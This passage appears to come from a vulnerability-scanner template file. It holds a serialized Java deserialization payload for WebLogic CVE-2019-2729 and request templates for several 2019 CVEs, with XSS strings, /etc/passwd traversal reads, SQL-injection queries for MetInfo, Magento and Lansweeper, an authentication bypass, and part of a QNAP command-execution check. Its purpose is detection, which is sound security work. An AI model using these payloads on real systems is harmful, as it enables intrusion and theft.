index=\"2936\"><byte>108</byte></void><void index=\"2937\"><byte>47</byte></void><void index=\"2938\"><byte>112</byte></void><void index=\"2939\"><byte>97</byte></void><void index=\"2940\"><byte>121</byte></void><void index=\"2941\"><byte>108</byte></void><void index=\"2942\"><byte>111</byte></void><void index=\"2943\"><byte>97</byte></void><void index=\"2944\"><byte>100</byte></void><void index=\"2945\"><byte>115</byte></void><void index=\"2946\"><byte>47</byte></void><void index=\"2947\"><byte>117</byte></void><void index=\"2948\"><byte>116</byte></void><void index=\"2949\"><byte>105</byte></void><void index=\"2950\"><byte>108</byte></void><void index=\"2951\"><byte>47</byte></void><void index=\"2952\"><byte>71</byte></void><void index=\"2953\"><byte>97</byte></void><void index=\"2954\"><byte>100</byte></void><void index=\"2955\"><byte>103</byte></void><void index=\"2956\"><byte>101</byte></void><void index=\"2957\"><byte>116</byte></void><void index=\"2958\"><byte>115</byte></void><void index=\"2959\"><byte>0</byte></void><void index=\"2960\"><byte>33</byte></void><void index=\"2961\"><byte>0</byte></void><void index=\"2962\"><byte>2</byte></void><void index=\"2963\"><byte>0</byte></void><void index=\"2964\"><byte>3</byte></void><void index=\"2965\"><byte>0</byte></void><void index=\"2966\"><byte>1</byte></void><void index=\"2967\"><byte>0</byte></void><void index=\"2968\"><byte>4</byte></void><void index=\"2969\"><byte>0</byte></void><void index=\"2970\"><byte>1</byte></void><void index=\"2971\"><byte>0</byte></void><void index=\"2972\"><byte>26</byte></void><void index=\"2973\"><byte>0</byte></void><void index=\"2974\"><byte>5</byte></void><void index=\"2975\"><byte>0</byte></void><void index=\"2976\"><byte>6</byte></void><void index=\"2977\"><byte>0</byte></void><void index=\"2978\"><byte>1</byte></void><void index=\"2979\"><byte>0</byte></void><void index=\"2980\"><byte>7</byte></void><void index=\"2981\"><byte>0</byte></void><void index=\"2982\"><byte>0</byte></void><void index=\"2983\"><byte>0</byte></void><void index=\"2984\"><byte>2</byte></void><void index=\"2985\"><byte>0</byte></void><void index=\"2986\"><byte>8</byte></void><void index=\"2987\"><byte>0</byte></void><void index=\"2988\"><byte>1</byte></void><void index=\"2989\"><byte>0</byte></void><void index=\"2990\"><byte>1</byte></void><void index=\"2991\"><byte>0</byte></void><void index=\"2992\"><byte>10</byte></void><void index=\"2993\"><byte>0</byte></void><void index=\"2994\"><byte>11</byte></void><void index=\"2995\"><byte>0</byte></void><void index=\"2996\"><byte>1</byte></void><void index=\"2997\"><byte>0</byte></void><void index=\"2998\"><byte>12</byte></void><void index=\"2999\"><byte>0</byte></void><void index=\"3000\"><byte>0</byte></void><void index=\"3001\"><byte>0</byte></void><void index=\"3002\"><byte>47</byte></void><void index=\"3003\"><byte>0</byte></void><void index=\"3004\"><byte>1</byte></void><void index=\"3005\"><byte>0</byte></void><void index=\"3006\"><byte>1</byte></void><void index=\"3007\"><byte>0</byte></void><void index=\"3008\"><byte>0</byte></void><void index=\"3009\"><byte>0</byte></void><void index=\"3010\"><byte>5</byte></void><void index=\"3011\"><byte>42</byte></void><void index=\"3012\"><byte>-73</byte></void><void index=\"3013\"><byte>0</byte></void><void index=\"3014\"><byte>1</byte></void><void index=\"3015\"><byte>-79</byte></void><void index=\"3016\"><byte>0</byte></void><void index=\"3017\"><byte>0</byte></void><void index=\"3018\"><byte>0</byte></void><void index=\"3019\"><byte>2</byte></void><void index=\"3020\"><byte>0</byte></void><void index=\"3021\"><byte>13</byte></void><void index=\"3022\"><byte>0</byte></void><void index=\"3023\"><byte>0</byte></void><void index=\"3024\"><byte>0</byte></void><void index=\"3025\"><byte>6</byte></void><void index=\"3026\"><byte>0</byte></void><void index=\"3027\"><byte>1</byte></void><void index=\"3028\"><byte>0</byte></void><void index=\"3029\"><byte>0</byte></void><void index=\"3030\"><byte>0</byte></void><void index=\"3031\"><byte>54</byte></void><void index=\"3032\"><byte>0</byte></void><void index=\"3033\"><byte>14</byte></void><void index=\"3034\"><byte>0</byte></void><void index=\"3035\"><byte>0</byte></void><void index=\"3036\"><byte>0</byte></void><void index=\"3037\"><byte>12</byte></void><void index=\"3038\"><byte>0</byte></void><void index=\"3039\"><byte>1</byte></void><void index=\"3040\"><byte>0</byte></void><void index=\"3041\"><byte>0</byte></void><void index=\"3042\"><byte>0</byte></void><void index=\"3043\"><byte>5</byte></void><void index=\"3044\"><byte>0</byte></void><void index=\"3045\"><byte>15</byte></void><void index=\"3046\"><byte>0</byte></void><void index=\"3047\"><byte>18</byte></void><void index=\"3048\"><byte>0</byte></void><void index=\"3049\"><byte>0</byte></void><void index=\"3050\"><byte>0</byte></void><void index=\"3051\"><byte>2</byte></void><void index=\"3052\"><byte>0</byte></void><void index=\"3053\"><byte>19</byte></void><void index=\"3054\"><byte>0</byte></void><void index=\"3055\"><byte>0</byte></void><void index=\"3056\"><byte>0</byte></void><void index=\"3057\"><byte>2</byte></void><void index=\"3058\"><byte>0</byte></void><void index=\"3059\"><byte>20</byte></void><void index=\"3060\"><byte>0</byte></void><void index=\"3061\"><byte>17</byte></void><void index=\"3062\"><byte>0</byte></void><void index=\"3063\"><byte>0</byte></void><void index=\"3064\"><byte>0</byte></void><void index=\"3065\"><byte>10</byte></void><void index=\"3066\"><byte>0</byte></void><void index=\"3067\"><byte>1</byte></void><void index=\"3068\"><byte>0</byte></void><void index=\"3069\"><byte>2</byte></void><void index=\"3070\"><byte>0</byte></void><void index=\"3071\"><byte>22</byte></void><void index=\"3072\"><byte>0</byte></void><void index=\"3073\"><byte>16</byte></void><void index=\"3074\"><byte>0</byte></void><void index=\"3075\"><byte>9</byte></void><void index=\"3076\"><byte>112</byte></void><void index=\"3077\"><byte>116</byte></void><void index=\"3078\"><byte>0</byte></void><void index=\"3079\"><byte>4</byte></void><void index=\"3080\"><byte>80</byte></void><void index=\"3081\"><byte>119</byte></void><void index=\"3082\"><byte>110</byte></void><void index=\"3083\"><byte>114</byte></void><void index=\"3084\"><byte>112</byte></void><void index=\"3085\"><byte>119</byte></void><void index=\"3086\"><byte>1</byte></void><void index=\"3087\"><byte>0</byte></void><void index=\"3088\"><byte>120</byte></void><void index=\"3089\"><byte>115</byte></void><void index=\"3090\"><byte>125</byte></void><void index=\"3091\"><byte>0</byte></void><void index=\"3092\"><byte>0</byte></void><void index=\"3093\"><byte>0</byte></void><void index=\"3094\"><byte>1</byte></void><void index=\"3095\"><byte>0</byte></void><void index=\"3096\"><byte>29</byte></void><void index=\"3097\"><byte>106</byte></void><void index=\"3098\"><byte>97</byte></void><void index=\"3099\"><byte>118</byte></void><void index=\"3100\"><byte>97</byte></void><void index=\"3101\"><byte>120</byte></void><void index=\"3102\"><byte>46</byte></void><void index=\"3103\"><byte>120</byte></void><void index=\"3104\"><byte>109</byte></void><void index=\"3105\"><byte>108</byte></void><void index=\"3106\"><byte>46</byte></void><void index=\"3107\"><byte>116</byte></void><void index=\"3108\"><byte>114</byte></void><void index=\"3109\"><byte>97</byte></void><void index=\"3110\"><byte>110</byte></void><void index=\"3111\"><byte>115</byte></void><void index=\"3112\"><byte>102</byte></void><void index=\"3113\"><byte>111</byte></void><void index=\"3114\"><byte>114</byte></void><void index=\"3115\"><byte>109</byte></void><void index=\"3116\"><byte>46</byte></void><void index=\"3117\"><byte>84</byte></void><void index=\"3118\"><byte>101</byte></void><void index=\"3119\"><byte>109</byte></void><void index=\"3120\"><byte>112</byte></void><void index=\"3121\"><byte>108</byte></void><void index=\"3122\"><byte>97</byte></void><void index=\"3123\"><byte>116</byte></void><void index=\"3124\"><byte>101</byte></void><void index=\"3125\"><byte>115</byte></void><void index=\"3126\"><byte>120</byte></void><void index=\"3127\"><byte>114</byte></void><void index=\"3128\"><byte>0</byte></void><void index=\"3129\"><byte>23</byte></void><void index=\"3130\"><byte>106</byte></void><void index=\"3131\"><byte>97</byte></void><void index=\"3132\"><byte>118</byte></void><void index=\"3133\"><byte>97</byte></void><void index=\"3134\"><byte>46</byte></void><void index=\"3135\"><byte>108</byte></void><void index=\"3136\"><byte>97</byte></void><void index=\"3137\"><byte>110</byte></void><void index=\"3138\"><byte>103</byte></void><void index=\"3139\"><byte>46</byte></void><void index=\"3140\"><byte>114</byte></void><void index=\"3141\"><byte>101</byte></void><void index=\"3142\"><byte>102</byte></void><void index=\"3143\"><byte>108</byte></void><void index=\"3144\"><byte>101</byte></void><void index=\"3145\"><byte>99</byte></void><void index=\"3146\"><byte>116</byte></void><void index=\"3147\"><byte>46</byte></void><void index=\"3148\"><byte>80</byte></void><void index=\"3149\"><byte>114</byte></void><void index=\"3150\"><byte>111</byte></void><void index=\"3151\"><byte>120</byte></void><void index=\"3152\"><byte>121</byte></void><void index=\"3153\"><byte>-31</byte></void><void index=\"3154\"><byte>39</byte></void><void index=\"3155\"><byte>-38</byte></void><void index=\"3156\"><byte>32</byte></void><void index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-19368","info":{"name":"Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=''><sVg/OnLoAD=alert`1337`//'>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8442","info":{"name":"Jira - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11013","info":{"name":"Nimble Streamer <=3.5.4-9 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7139","info":{"name":"Magento - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"text/x-magento-init\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nGET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT*FROM+(SELECT+SLEEP((8)))a)%3d1+--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"stop-at-first-match":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=8","contains(content_type_1, \"application/json\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["contains(content_type_2, \"application/json\") && contains(content_type_3, \"application/json\")","status_code_2 == 200 && status_code_3 == 400","len(body_2) == 2 && len(body_3) == 2"],"condition":"and"}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Proxy Error"]},{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 